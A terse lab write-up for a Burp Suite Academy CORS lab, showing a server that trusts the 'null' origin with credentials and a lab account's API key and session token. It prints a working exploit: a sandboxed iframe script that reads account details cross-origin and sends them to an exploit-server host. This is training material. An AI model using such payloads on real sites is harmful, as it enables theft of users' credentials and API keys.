##################################
#           CORS Vulnerabilities          
#      2nd Lab in Burp Suite Academy    
##################################

##################################
#                FIND VULNERABILITY                

Request from client:
GET /accountDetails HTTP/2
Host: 0a5b00a1043c62358079445000120001.web-security-academy.net
Origin: null

Response from server:
HTTP/2 200 OK
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 149

{
  "username": "wiener",
  "email": "",
  "apikey": "e5yApoBFZgpq7gppiojIlzxoKiPUFvaK",
  "sessions": [
    "mBwVEnqr4mxASf6sFVQufqpRf4yblrQF"
  ]
}

##################################
#                WRITE EXPLOIT                
##################################

<html>
    <body>
        <iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="
            <script>
                var req = new XMLHttpRequest();
                req.onreadystatechange = function () {
                    if (req.readyState == XMLHttpRequest.DONE){
                        fetch('https://exploit-0a91009f04226271802f43bc01b800e2.exploit-server.net/log?key=' + req.responseText)
                    }
                }
                req.open('GET', 'https://0a5b00a1043c62358079445000120001.web-security-academy.net/accountDetails', true);
                req.withCredentials = true;
                req.send(null);
            </script>
        "></iframe>
    </body>
</html>

##################################
##################################
##################################
              GAME OVER
